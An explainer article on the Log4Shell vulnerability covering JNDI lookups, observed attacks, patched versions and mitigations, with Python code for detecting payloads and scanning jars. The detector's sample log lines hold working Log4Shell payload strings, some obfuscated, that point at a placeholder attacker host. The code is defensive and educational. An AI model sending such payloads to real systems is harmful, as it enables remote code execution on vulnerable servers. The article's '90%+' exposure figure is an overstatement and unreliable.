At the end of November 2021 a major cybersecurity threat came to light, one that could affect millions of computers worldwide.
This article is a guide to the Log4j vulnerability and to how a single design flaw left the open services of an estimated 90%+ of the world's computers exposed to attack.
Apache Log4j is an open-source, Java-based logging utility maintained by the Apache Software Foundation. Originally written by Ceki Gülcü in 2001, it is now part of Apache Logging Services, a project of the Apache Software Foundation.
Companies around the world use the Log4j library to add logging to their applications. The Java library is, in fact, found everywhere: you will find it in software from Amazon, Microsoft, Google and many others.
The library's popularity means that any bug in its code can leave millions of computers open to compromise. On November 24, 2021, a cloud security researcher working for Alibaba found exactly such a serious flaw.
The Log4j vulnerability, also known as Log4Shell (tracked as CVE-2021-44228), had been present, unnoticed, since 2013. It allows malicious actors to run code on affected systems that use Log4j. It was publicly disclosed on December 9, 2021.
Industry experts have called the Log4Shell flaw the most serious vulnerability in recent memory.
In the week after the disclosure, cybersecurity teams observed millions of attack attempts. Some researchers saw more than a hundred attempts per minute.
Why does it work?
To understand why Log4Shell is so dangerous, we need to understand what it lets an attacker do.
The Log4Shell vulnerability allows arbitrary code execution, which means an attacker can run any command or code of their choosing on the targeted machine.
How does it do this?
First, we need to understand what JNDI is.
The Java Naming and Directory Interface (JNDI) is a Java API that lets Java programs discover and look up data and resources by name. Such directory services are useful because they give developers an organized set of records that can be referenced simply when building applications.
JNDI can use several protocols to reach a directory. One of them is the Lightweight Directory Access Protocol, or LDAP.
When formatting a log message, Log4j performs string substitution whenever it encounters an expression of the form ${prefix:name}.
For example, the text ${java:version} is rewritten as Java version 1.8.0_65. Substitutions of this kind are commonplace.
We can also write an expression such as ${jndi:ldap://example.com/file}, which uses JNDI to load a Java object from that URL via the LDAP protocol.
This effectively pulls data from the URL onto the machine doing the logging. Any would-be attacker can host malicious code at a public URL and wait for machines running Log4j to log a string that points at it.
Because log messages routinely include user-controlled data (a User-Agent header, a username, a chat message), criminals can insert their own JNDI references pointing at LDAP servers they control. Those LDAP servers can be stocked with malicious Java objects that JNDI will load and execute through the vulnerability.
What makes this especially bad is that it does not matter whether the application is server-side or client-side.
As long as there is some path by which the logger reads the attacker's string, the application is open to exploitation.
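The substitution mechanism described above (the ${prefix:name} expansion, the jndi: prefix, and the way user-controlled input reaches it) can be modelled directly. The following Python is an added example written for this page; it is not code from Log4j or from the original article. It re-implements the lookup syntax with a resolver that records JNDI targets instead of connecting, so it also works as a detector that sees through the nested obfuscations (${lower:j}, ${::-j}, ${env:NaN:-j}) attackers used to slip past simple pattern matching. The ${java:...} and ${env:...} values, the sample log lines and the host attacker.example are constructed for the example.

```python
import re
from typing import Callable, Dict, List, Optional, Tuple

# Constructed stand-ins for what Log4j's ${java:...} and ${env:...} lookups
# would read from the real host (assumptions for this example).
FAKE_JAVA = {"version": "Java version 1.8.0_65"}
FAKE_ENV = {"HOME": "/home/app"}


def blocked_jndi_resolver(name: str) -> str:
    """Stand-in for the JNDI lookup. Log4j before 2.15.0 would call
    InitialContext().lookup(name) here; for an ldap:// name that means
    connecting to the attacker's server. This stand-in never connects."""
    return "<JNDI lookup of %s blocked>" % name


class LookupEngine:
    """Toy model (not Log4j's code) of the ${prefix:name} substitution that
    Log4j 2 applied to log messages before 2.15.0: expressions nest and are
    resolved inside out, ':-' supplies a default when a lookup fails, and the
    'jndi' prefix hands the resolved name to a resolver."""

    def __init__(self, jndi_resolver: Callable[[str], str] = blocked_jndi_resolver,
                 message_lookups: bool = True) -> None:
        self.jndi_resolver = jndi_resolver
        # False models log4j2.formatMsgNoLookups=true (2.10+) and the 2.16.0
        # behaviour of never interpreting lookups inside messages.
        self.message_lookups = message_lookups
        self.jndi_calls: List[str] = []
        self.lookups: Dict[str, Callable[[str], Optional[str]]] = {
            "java": FAKE_JAVA.get,
            "env": FAKE_ENV.get,
            "lower": str.lower,
            "jndi": self._jndi,
        }

    def _jndi(self, name: str) -> str:
        self.jndi_calls.append(name)
        return self.jndi_resolver(name)

    def resolve(self, message: str) -> str:
        """Return the message with every ${...} expression substituted."""
        if not self.message_lookups:
            return message
        return self._parse(message, 0, top=True)[0]

    def _parse(self, text: str, i: int, top: bool) -> Tuple[str, int, bool]:
        """Consume text from i up to the '}' closing the current expression
        (or to the end at top level). Returns (resolved, next index, closed)."""
        buf: List[str] = []
        while i < len(text):
            if text.startswith("${", i):
                inner, i, closed = self._parse(text, i + 2, top=False)
                # An unterminated '${' stays literal, as in Log4j.
                buf.append(self._evaluate(inner) if closed else "${" + inner)
                continue
            if text[i] == "}" and not top:
                return "".join(buf), i + 1, True
            buf.append(text[i])
            i += 1
        return "".join(buf), i, top

    def _evaluate(self, body: str) -> str:
        """Evaluate one already-flattened 'prefix:name[:-default]' body."""
        key, has_default, default = body.partition(":-")
        prefix, _, name = key.partition(":")
        handler = self.lookups.get(prefix)
        value = handler(name) if handler else None
        if value is not None:
            return value
        return default if has_default else "${" + body + "}"


# Constructed request log lines; attacker.example is a placeholder host.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1 User-Agent: Mozilla/5.0",
    "GET / HTTP/1.1 User-Agent: ${jndi:ldap://attacker.example/a}",
    "GET / HTTP/1.1 User-Agent: ${${lower:J}ndi:${lower:L}dap://attacker.example/a}",
    "GET / HTTP/1.1 User-Agent: ${${env:NaN:-j}ndi:${::-l}dap://attacker.example/a}",
    "GET / HTTP/1.1 User-Agent: ${java:version}",
]

NAIVE_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def naive_regex_hit(message: str) -> bool:
    """First-generation WAF rule: matches only the unobfuscated form."""
    return NAIVE_PATTERN.search(message) is not None


def jndi_target(message: str) -> Optional[str]:
    """Resolve the message as a vulnerable Log4j would, but with a resolver
    that records instead of connecting; return the JNDI name that would have
    been fetched, or None."""
    engine = LookupEngine()
    engine.resolve(message)
    return engine.jndi_calls[0] if engine.jndi_calls else None


if __name__ == "__main__":
    for msg in SAMPLE_REQUESTS:
        print("naive=%-5s resolved=%-28s %s" % (naive_regex_hit(msg), jndi_target(msg), msg))
    print("lookups disabled:", LookupEngine(message_lookups=False).resolve(SAMPLE_REQUESTS[2]))
```

Run as a script it prints, for each sample line, whether the naive regex fires and which JNDI name full resolution would have fetched: the naive rule catches only the second line, while resolution reports ldap://attacker.example/a for lines two, three and four and nothing for the harmless ${java:version}. Constructing the engine with message_lookups=False returns every message untouched, which is why disabling message lookups (or upgrading to a release that never performs them) closes the hole regardless of how the payload is encoded.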
Who is affected?
This vulnerability affects systems and services using Apache Log4j 2, from version 2.0-beta9 up to and including 2.14.1.
Several security experts warn that the vulnerability could affect a very large number of Java applications.
The flaw first drew wide public attention through Microsoft's Minecraft video game. Microsoft advised its users to update their Minecraft: Java Edition software to remove the risk.
Jen Easterly, Director of the Cybersecurity and Infrastructure Security Agency (CISA), says vendors bear a major responsibility for protecting users from malicious actors exploiting this vulnerability.
"Vendors should also be communicating with their customers to ensure end users know that their product contains this vulnerability and should prioritize software updates."
The attacks are already under way. Symantec, a cybersecurity software company, has seen a wide variety of exploitation requests.
Here are some examples of the kinds of attack researchers have observed:
- Botnets
A botnet is a network of computers under the control of a single attacking party. Botnets are used to carry out DDoS attacks, steal data and commit other crimes. Researchers have observed the Muhstik botnet in records of Log4j exploitation attempts.
- XMRig miner trojan
XMRig is an open-source cryptocurrency miner that uses CPUs to mine the Monero token. Cybercriminals install XMRig on victims' devices to use their processing power without their knowledge.
- Khonsari ransomware
Ransomware is a form of malware designed to encrypt the files on a computer. The attackers then demand payment in exchange for restoring access to the encrypted files. Researchers have found the Khonsari ransomware being delivered in Log4Shell attacks. It targets Windows servers and is built on the .NET framework.
What happens now?
Experts predict that it could take months or even years to fully clean up the mess created by the Log4j vulnerability.
That process includes updating every affected system to a patched version. Even once all these systems are patched, there remains the lingering threat of backdoors that criminals may already have planted during the window in which servers were open to attack.
Many fixes and mitigations exist to protect applications from this bug. The Log4j 2.15.0 release changed several defaults to mitigate it: features that use JNDI are disabled by default and remote lookups are blocked. That fix turned out to be incomplete (CVE-2021-45046), and 2.16.0 went further by removing message lookups entirely; anyone still on 2.15.0 should move to the latest 2.17.x release.
Disabling the lookup feature in your Log4j configuration, or removing the JndiLookup class from the log4j-core jar where an upgrade is not yet possible, reduces the risk of exploitation.
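The mitigations above (upgrade, disable lookups, or remove the JndiLookup class) come down to a question every operator had to answer: which log4j-core jars are on this host, what version are they, and is JndiLookup.class still inside? The following Python script is an added example, not part of the original article or of the Log4j project. It reads the version from a jar's manifest (falling back to the Maven pom.properties that log4j-core jars carry), checks for the JndiLookup class, classifies the result against the known fix history (2.15.0 incomplete, CVE-2021-45046; 2.16.0 removes message lookups; 2.17.1 current for the follow-up CVEs; 2.12.x and 2.3.x backport lines for Java 7 and Java 6), and can rewrite a jar without the class, which is what Apache's zip -q -d mitigation does on the command line. The jars it inspects are constructed in memory from a fake manifest and placeholder class entries, not real Log4j builds.

```python
import io
import re
import zipfile
from typing import Optional, Tuple

# Class whose removal was Apache's documented mitigation when upgrading was
# not possible:  zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
MANIFEST = "META-INF/MANIFEST.MF"
POM_PREFIX = "META-INF/maven/org.apache.logging.log4j/log4j-core/"


def version_key(version: str) -> Tuple[Tuple[int, ...], int, int, int]:
    """Sortable key for Log4j version strings such as 2.0-beta9, 2.0-rc1 or
    2.14.1. Pre-releases sort before the final release of the same number."""
    base, _, pre = version.partition("-")
    parts = [int(x) for x in base.split(".")]
    nums = tuple(parts + [0] * (3 - len(parts)))
    if not pre:
        return nums, 1, 0, 0
    m = re.match(r"([A-Za-z]+)(\d*)", pre)
    label = m.group(1).lower() if m else ""
    rank = {"alpha": 0, "beta": 1, "rc": 2}.get(label, 3)
    num = int(m.group(2)) if m and m.group(2) else 0
    return nums, 0, rank, num


def classify(version: Optional[str], jndi_present: bool) -> str:
    """Map a log4j-core version plus the presence of JndiLookup.class to an
    exposure verdict for CVE-2021-44228 and its follow-up fixes."""
    if version is None:
        return "unknown version: inspect manually"
    key = version_key(version)
    major, minor, patch = key[0][:3]
    if key < version_key("2.0-beta9"):
        return "not affected by CVE-2021-44228 (note: Log4j 1.x is end-of-life)"
    if (major, minor) == (2, 12) and patch >= 2:
        return "fixed (Java 7 backport line; 2.12.4 has all follow-up fixes)"
    if (major, minor) == (2, 3) and patch >= 1:
        return "fixed (Java 6 backport line; 2.3.2 has all follow-up fixes)"
    if key <= version_key("2.14.1"):
        if jndi_present:
            return "VULNERABLE to CVE-2021-44228 (Log4Shell)"
        return "mitigated: JndiLookup.class removed, but still upgrade"
    if key < version_key("2.16.0"):
        return "2.15.x: incomplete fix (CVE-2021-45046), upgrade"
    if key < version_key("2.17.1"):
        return "Log4Shell fixed; upgrade to 2.17.1 for CVE-2021-45105 and CVE-2021-44832"
    return "fixed"


def read_version(zf: zipfile.ZipFile) -> Optional[str]:
    """Version from the manifest's Implementation-Version header, falling
    back to Maven's pom.properties inside the jar."""
    names = zf.namelist()
    if MANIFEST in names:
        for line in zf.read(MANIFEST).decode("utf-8", "replace").splitlines():
            if line.startswith("Implementation-Version:"):
                return line.split(":", 1)[1].strip()
    for name in names:
        if name.startswith(POM_PREFIX) and name.endswith("pom.properties"):
            for line in zf.read(name).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    return line.split("=", 1)[1].strip()
    return None


def inspect_jar(data: bytes) -> dict:
    """Inspect one jar's bytes and return version, class presence and verdict."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        version = read_version(zf)
        jndi_present = JNDI_CLASS in zf.namelist()
    return {"version": version, "jndi_lookup_present": jndi_present,
            "status": classify(version, jndi_present)}


def strip_jndi_lookup(data: bytes) -> bytes:
    """Rewrite the jar without JndiLookup.class, the in-Python equivalent of
    the 'zip -q -d' mitigation. Every other entry is copied unchanged."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename != JNDI_CLASS:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def build_fake_jar(version: str, include_jndi_class: bool = True) -> bytes:
    """Constructed stand-in for log4j-core-<version>.jar: a manifest plus
    placeholder class entries. Not a real Log4j build."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(MANIFEST, "Manifest-Version: 1.0\r\n"
                              "Implementation-Title: Apache Log4j Core\r\n"
                              "Implementation-Version: %s\r\n" % version)
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi_class:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    for v in ["2.0-beta8", "2.0-beta9", "2.12.2", "2.14.1", "2.15.0", "2.16.0", "2.17.1"]:
        print("%-9s %s" % (v, inspect_jar(build_fake_jar(v))["status"]))
    print("2.14.1 after strip:", inspect_jar(strip_jndi_lookup(build_fake_jar("2.14.1")))["status"])
```

On a real host you would feed inspect_jar the bytes of every log4j-core-*.jar found on disk, including jars nested inside WAR and EAR archives, which is where most missed copies lived. The version check alone is not enough: a jar reporting 2.14.1 with JndiLookup.class already stripped is mitigated, while a 2.15.0 jar that still carries the class is not fully fixed, which is why the verdict depends on both inputs.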
Beyond Log4j, there is still a need for a broader framework for protecting open-source projects.
Earlier in 2021, in May, the White House issued an executive order aimed at improving the nation's cybersecurity. It included the adoption of the software bill of materials (SBOM), a formal record listing every component used to build an application.
That covers components such as open-source packages, dependencies and APIs used in development. The SBOM concept helps with transparency, but will it help the consumer?
Upgrading dependencies may be the harder problem. Companies may simply choose to pay whatever fine applies rather than risk the time it takes to find replacement packages. SBOMs may only help if their scope is extended further.
Conclusion
The Log4j episode is more than a technical problem for organizations.
Business leaders need to be aware of the risks that arise when their servers, products or services depend on code that they do not maintain themselves.
Relying on open-source and third-party components always carries some level of risk. Companies should think about risk-reduction measures before the next threat arrives.
Much of the web depends on open-source software maintained by thousands of volunteers around the world.
If we want to keep the web a safe place, governments and companies need to invest in funding open-source efforts and cybersecurity agencies such as CISA.